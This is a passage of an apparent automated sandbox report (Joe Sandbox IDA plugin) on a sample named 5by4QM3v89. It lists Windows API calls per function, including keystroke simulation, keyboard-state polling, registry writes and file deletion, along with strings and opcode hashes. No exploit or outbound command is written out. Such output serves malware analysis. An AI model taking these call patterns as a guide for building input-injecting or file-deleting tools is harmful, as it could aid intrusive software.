                                                            • Part of subcall function 003925DB: GetWindowLongW.USER32(?,000000EB), ref: 003925EC
                                                          • GetWindowLongW.USER32(?,000000F0), ref: 0041D351
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                          • String ID: @GUI_DRAGID$F$pbE
                                                          • API String ID: 3977979337-81612502
                                                          • Opcode ID: 9781838effd481f7af9f3d414cd97bec1d5dcfa75fe7c0d705b15f16ec162585
                                                          • Instruction ID: f5ea5a71f6979ce32b65a0cd2661640b2e84b33ba7eddb3b3dfdc82864000cd2
                                                          • Opcode Fuzzy Hash: 9781838effd481f7af9f3d414cd97bec1d5dcfa75fe7c0d705b15f16ec162585
                                                          • Instruction Fuzzy Hash: 2942CA74608340AFCB21CF28DC84AAABBE5FF49310F14492AF555C73A1C735E895DB9A
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: _memmove$_memset
                                                          • String ID: ]D$3c:$DEFINE$P\D$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)$_:
                                                          • API String ID: 1357608183-1634533736
                                                          • Opcode ID: 873cd39fcfac8df612cd332d1f1aca514223b5f5664e3805938ef9ad7922d667
                                                          • Instruction ID: 1b98fb838263c2ad6f20cf9cf273dd1ee0b0afcf67df168708d83a09b9a3a6ca
                                                          • Opcode Fuzzy Hash: 873cd39fcfac8df612cd332d1f1aca514223b5f5664e3805938ef9ad7922d667
                                                          • Instruction Fuzzy Hash: 3793B275E00269DBDF26CF59C881BADB7B5FF48310F25826AE945AB2C1E7709D81CB40
                                                          APIs
                                                          • GetForegroundWindow.USER32(00000000,?), ref: 003948DF
                                                          • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 003CD665
                                                          • IsIconic.USER32(?), ref: 003CD66E
                                                          • ShowWindow.USER32(?,00000009), ref: 003CD67B
                                                          • SetForegroundWindow.USER32(?), ref: 003CD685
                                                          • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 003CD69B
                                                          • GetCurrentThreadId.KERNEL32 ref: 003CD6A2
                                                          • GetWindowThreadProcessId.USER32(?,00000000), ref: 003CD6AE
                                                          • AttachThreadInput.USER32(?,00000000,00000001), ref: 003CD6BF
                                                          • AttachThreadInput.USER32(?,00000000,00000001), ref: 003CD6C7
                                                          • AttachThreadInput.USER32(00000000,?,00000001), ref: 003CD6CF
                                                          • SetForegroundWindow.USER32(?), ref: 003CD6D2
                                                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 003CD6E7
                                                          • keybd_event.USER32(00000012,00000000), ref: 003CD6F2
                                                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 003CD6FC
                                                          • keybd_event.USER32(00000012,00000000), ref: 003CD701
                                                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 003CD70A
                                                          • keybd_event.USER32(00000012,00000000), ref: 003CD70F
                                                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 003CD719
                                                          • keybd_event.USER32(00000012,00000000), ref: 003CD71E
                                                          • SetForegroundWindow.USER32(?), ref: 003CD721
                                                          • AttachThreadInput.USER32(?,?,00000000), ref: 003CD748
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                          • String ID: Shell_TrayWnd
                                                          • API String ID: 4125248594-2988720461
                                                          • Opcode ID: 007971f52067a02c428a98a73854044489c81cc6132d4332087d1b40a99fb606
                                                          • Instruction ID: a27d32ecad01a3b9fe15c72ba4c5cbd3d4ffb1521c842d880200d3fafbb0451e
                                                          • Opcode Fuzzy Hash: 007971f52067a02c428a98a73854044489c81cc6132d4332087d1b40a99fb606
                                                          • Instruction Fuzzy Hash: EE318571A40318BBEB216F619C49FBF7F6DEB44B50F118039FA04EA1D1D6B05D12ABA4
                                                          APIs
                                                          • FindFirstFileW.KERNEL32(?,?), ref: 003FC78D
                                                          • FindClose.KERNEL32(00000000), ref: 003FC7E1
                                                          • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 003FC806
                                                          • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 003FC81D
                                                          • FileTimeToSystemTime.KERNEL32(?,?), ref: 003FC844
                                                          • __swprintf.LIBCMT ref: 003FC890
                                                          • __swprintf.LIBCMT ref: 003FC8D3
                                                            • Part of subcall function 00397DE1: _memmove.LIBCMT ref: 00397E22
                                                          • __swprintf.LIBCMT ref: 003FC927
                                                            • Part of subcall function 003B3698: __woutput_l.LIBCMT ref: 003B36F1
                                                          • __swprintf.LIBCMT ref: 003FC975
                                                            • Part of subcall function 003B3698: __flsbuf.LIBCMT ref: 003B3713
                                                            • Part of subcall function 003B3698: __flsbuf.LIBCMT ref: 003B372B
                                                          • __swprintf.LIBCMT ref: 003FC9C4
                                                          • __swprintf.LIBCMT ref: 003FCA13
                                                          • __swprintf.LIBCMT ref: 003FCA62
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
                                                          • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                          • API String ID: 3953360268-2428617273
                                                          • Opcode ID: fbdb3149def86389373eb2d600a2af849da59dc8b152567575b8a4359c7dac58
                                                          • Instruction ID: 20d25596e6cc458c8fcd27bcc8f571947ab9d5c9be73c348a45df03f73a6365c
                                                          • Opcode Fuzzy Hash: fbdb3149def86389373eb2d600a2af849da59dc8b152567575b8a4359c7dac58
                                                          • Instruction Fuzzy Hash: 8DA120B1418204ABDB01EF64C985EBFB7ECEF95704F40491EF595CA191EB35DA08CB62
                                                          APIs
                                                          • FindFirstFileW.KERNEL32(?,?,774C8FB0,?,00000000), ref: 003FEFB6
                                                          • _wcscmp.LIBCMT ref: 003FEFCB
                                                          • _wcscmp.LIBCMT ref: 003FEFE2
                                                          • GetFileAttributesW.KERNEL32(?), ref: 003FEFF4
                                                          • SetFileAttributesW.KERNEL32(?,?), ref: 003FF00E
                                                          • FindNextFileW.KERNEL32(00000000,?), ref: 003FF026
                                                          • FindClose.KERNEL32(00000000), ref: 003FF031
                                                          • FindFirstFileW.KERNEL32(*.*,?), ref: 003FF04D
                                                          • _wcscmp.LIBCMT ref: 003FF074
                                                          • _wcscmp.LIBCMT ref: 003FF08B
                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 003FF09D
                                                          • SetCurrentDirectoryW.KERNEL32(00448920), ref: 003FF0BB
                                                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 003FF0C5
                                                          • FindClose.KERNEL32(00000000), ref: 003FF0D2
                                                          • FindClose.KERNEL32(00000000), ref: 003FF0E4
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                                          • String ID: *.*
                                                          • API String ID: 1803514871-438819550
                                                          • Opcode ID: 063bdf8eb36953c437111969277418ad326c4b478dcae8dd7bba2fb2fbecdbb1
                                                          • Instruction ID: 31bd964916d2a9495ab2c88d7bb929d7211fb0058d3c3139ead6c3f7194fb9ef
                                                          • Opcode Fuzzy Hash: 063bdf8eb36953c437111969277418ad326c4b478dcae8dd7bba2fb2fbecdbb1
                                                          • Instruction Fuzzy Hash: 5A31153250021E7EDB25EBB0DC48AFE77AC9F49360F1041B6EE04E21A1DF74DA45CA68
                                                          APIs
                                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00410953
                                                          • RegCreateKeyExW.ADVAPI32(?,?,00000000,0041F910,00000000,?,00000000,?,?), ref: 004109C1
                                                          • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00410A09
                                                          • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00410A92
                                                          • RegCloseKey.ADVAPI32(?), ref: 00410DB2
                                                          • RegCloseKey.ADVAPI32(00000000), ref: 00410DBF
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: Close$ConnectCreateRegistryValue
                                                          • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                          • API String ID: 536824911-966354055
                                                          • Opcode ID: 5e7b8376e042b9c092f8f3d649117088aa91de0230f80baf2d2fa6f40a788c59
                                                          • Instruction ID: 5035eb81241dc65dd48f5a6a54db607b886bec322d124a5b1adca3bcb77254a7
                                                          • Opcode Fuzzy Hash: 5e7b8376e042b9c092f8f3d649117088aa91de0230f80baf2d2fa6f40a788c59
                                                          • Instruction Fuzzy Hash: CB027A756046019FCB15EF28C841E6AB7E5FF89314F04855EF88A9B3A2DB74EC81CB85
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 0DC$0EC$0FC$3c:$ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)$pGC$_:
                                                          • API String ID: 0-3787263741
                                                          • Opcode ID: e100d352045c593d5ed5386058ef633f63504781b08e278071429879f8fb76be
                                                          • Instruction ID: 12a8dd3bf7a8d8e36a5563c97ece91aebc87a2918b9188d76a105f26f2691f17
                                                          • Opcode Fuzzy Hash: e100d352045c593d5ed5386058ef633f63504781b08e278071429879f8fb76be
                                                          • Instruction Fuzzy Hash: 1F7291B5E00269CBDF16CF59C8817AEB7B5FF49310F15816AE805EB690E7349D81CB90
                                                          APIs
                                                          • FindFirstFileW.KERNEL32(?,?,774C8FB0,?,00000000), ref: 003FF113
                                                          • _wcscmp.LIBCMT ref: 003FF128
                                                          • _wcscmp.LIBCMT ref: 003FF13F
                                                            • Part of subcall function 003F4385: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 003F43A0
                                                          • FindNextFileW.KERNEL32(00000000,?), ref: 003FF16E
                                                          • FindClose.KERNEL32(00000000), ref: 003FF179
                                                          • FindFirstFileW.KERNEL32(*.*,?), ref: 003FF195
                                                          • _wcscmp.LIBCMT ref: 003FF1BC
                                                          • _wcscmp.LIBCMT ref: 003FF1D3
                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 003FF1E5
                                                          • SetCurrentDirectoryW.KERNEL32(00448920), ref: 003FF203
                                                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 003FF20D
                                                          • FindClose.KERNEL32(00000000), ref: 003FF21A
                                                          • FindClose.KERNEL32(00000000), ref: 003FF22C
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                                          • String ID: *.*
                                                          • API String ID: 1824444939-438819550
                                                          • Opcode ID: 0ee804cfeeb4ef68785173c4354e2ef755edf3cd94aa5c78323fba06cf570f6c
                                                          • Instruction ID: 85505acccfa38367e43674c65da1c25ba4d7d4a7fddd3e7462da898076e29303
                                                          • Opcode Fuzzy Hash: 0ee804cfeeb4ef68785173c4354e2ef755edf3cd94aa5c78323fba06cf570f6c
                                                          • Instruction Fuzzy Hash: C031073A50061D7EDB21EFA0EC48AFE77AC9F45320F214576EE00E20A0DB30DE45CA58
                                                          APIs
                                                          • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 003FA20F
                                                          • __swprintf.LIBCMT ref: 003FA231
                                                          • CreateDirectoryW.KERNEL32(?,00000000), ref: 003FA26E
                                                          • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 003FA293
                                                          • _memset.LIBCMT ref: 003FA2B2
                                                          • _wcsncpy.LIBCMT ref: 003FA2EE
                                                          • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 003FA323
                                                          • CloseHandle.KERNEL32(00000000), ref: 003FA32E
                                                          • RemoveDirectoryW.KERNEL32(?), ref: 003FA337
                                                          • CloseHandle.KERNEL32(00000000), ref: 003FA341
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                          • String ID: :$\$\??\%s
                                                          • API String ID: 2733774712-3457252023
                                                          • Opcode ID: e433f7e9ba5c8e02e619c3b6cb5c31db7cc7b34e4a836f7dca8908d6bd9878ed
                                                          • Instruction ID: 0fa0284e701fa883bcf403d049472d778913998902541557f4beee3d1d589393
                                                          • Opcode Fuzzy Hash: e433f7e9ba5c8e02e619c3b6cb5c31db7cc7b34e4a836f7dca8908d6bd9878ed
                                                          • Instruction Fuzzy Hash: 2931A3B5500109ABDB22DFA0DC49FFB77BCEF89744F1041B6FA08D6160EB7096458B25
                                                          APIs
                                                          • GetKeyboardState.USER32(?), ref: 003F0097
                                                          • SetKeyboardState.USER32(?), ref: 003F0102
                                                          • GetAsyncKeyState.USER32(000000A0), ref: 003F0122
                                                          • GetKeyState.USER32(000000A0), ref: 003F0139
                                                          • GetAsyncKeyState.USER32(000000A1), ref: 003F0168
                                                          • GetKeyState.USER32(000000A1), ref: 003F0179
                                                          • GetAsyncKeyState.USER32(00000011), ref: 003F01A5
                                                          • GetKeyState.USER32(00000011), ref: 003F01B3
                                                          • GetAsyncKeyState.USER32(00000012), ref: 003F01DC
                                                          • GetKeyState.USER32(00000012), ref: 003F01EA
                                                          • GetAsyncKeyState.USER32(0000005B), ref: 003F0213
                                                          • GetKeyState.USER32(0000005B), ref: 003F0221
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: State$Async$Keyboard
                                                          • String ID:
                                                          • API String ID: 541375521-0
                                                          • Opcode ID: 19997f84b02bead45384573b2ee039d6904fe723d8c88d4ecccffb5287db8777
                                                          • Instruction ID: 77257b756a11dc4d43e6c1d055871046a32d089711d04a4498703a5fb0035c5c
                                                          • Opcode Fuzzy Hash: 19997f84b02bead45384573b2ee039d6904fe723d8c88d4ecccffb5287db8777
                                                          • Instruction Fuzzy Hash: 9A510C3490478D29FB3ADBB889547FABFB49F01380F09459EC6C15A1C3DAA49B8CC761
                                                          APIs
                                                            • Part of subcall function 00410E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0040FDAD,?,?), ref: 00410E31
                                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 004104AC
                                                            • Part of subcall function 00399837: __itow.LIBCMT ref: 00399862
                                                            • Part of subcall function 00399837: __swprintf.LIBCMT ref: 003998AC
                                                          • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 0041054B
                                                          • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 004105E3
                                                          • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00410822
                                                          • RegCloseKey.ADVAPI32(00000000), ref: 0041082F
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                                          • String ID:
                                                          • API String ID: 1240663315-0
                                                          • Opcode ID: f0cf52f620ee6c7ac983596803349e455424dbbfb5954ef3c956010cf378feb7
                                                          • Instruction ID: f5c2d98489b141bc1b6a95e89c615f3f985da51523d1628b264820147204c220
                                                          • Opcode Fuzzy Hash: f0cf52f620ee6c7ac983596803349e455424dbbfb5954ef3c956010cf378feb7
                                                          • Instruction Fuzzy Hash: 64E15F31204200AFCB15DF28C891E6BBBE5EF89314F04856EF44ADB2A1D774ED85CB96
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                          • String ID:
                                                          • API String ID: 1737998785-0
                                                          • Opcode ID: c184ddb5d1a5115ecc55e56605ca6fc306788d9e5de645813b4ed07a3076a357
                                                          • Instruction ID: 2388c6e64bad949467ab3429022c4a4138604d931acf8960b0490518898f29bf
                                                          • Opcode Fuzzy Hash: c184ddb5d1a5115ecc55e56605ca6fc306788d9e5de645813b4ed07a3076a357
                                                          • Instruction Fuzzy Hash: 9721A3753002109FDB11AF64DC09BAE7BA8EF45751F10807AFA46DB2A1DB74AC02CB59
                                                          APIs
                                                            • Part of subcall function 00394750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00394743,?,?,003937AE,?), ref: 00394770
                                                            • Part of subcall function 003F4A31: GetFileAttributesW.KERNEL32(?,003F370B), ref: 003F4A32
                                                          • FindFirstFileW.KERNEL32(?,?), ref: 003F38A3
                                                          • DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 003F394B
                                                          • MoveFileW.KERNEL32(?,?), ref: 003F395E
                                                          • DeleteFileW.KERNEL32(?,?,?,?,?), ref: 003F397B
                                                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 003F399D
                                                          • FindClose.KERNEL32(00000000,?,?,?,?), ref: 003F39B9
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
                                                          • String ID: \*.*
                                                          • API String ID: 4002782344-1173974218
                                                          • Opcode ID: 96253b28d4ee3a53700df2d04a32ddb3e135353a8d2c2a9328878357a545e8d7
                                                          • Instruction ID: 34cb56738aab180e788e6208a76d54b19dcd6160bebb266e27903fa23038e9c8
                                                          • Opcode Fuzzy Hash: 96253b28d4ee3a53700df2d04a32ddb3e135353a8d2c2a9328878357a545e8d7
                                                          • Instruction Fuzzy Hash: 5651503180514DAACF17EBA0D9929FEB779AF15300F604069E506BB191EF716F0DCB61
                                                          APIs
                                                            • Part of subcall function 00397DE1: _memmove.LIBCMT ref: 00397E22
                                                          • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 003FF440
                                                          • Sleep.KERNEL32(0000000A), ref: 003FF470
                                                          • _wcscmp.LIBCMT ref: 003FF484
                                                          • _wcscmp.LIBCMT ref: 003FF49F
                                                          • FindNextFileW.KERNEL32(?,?), ref: 003FF53D
                                                          • FindClose.KERNEL32(00000000), ref: 003FF553
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
                                                          • String ID: *.*
                                                          • API String ID: 713712311-438819550
                                                          • Opcode ID: 179952ca6a55abfaaffe5de58555cd963f97a2e21fe0ad73515c28e24eb29c70
                                                          • Instruction ID: d60a2b9d6ac15cc62f252061b1a1e1b48f68c5af92ad966a069c2c7dbd29e251
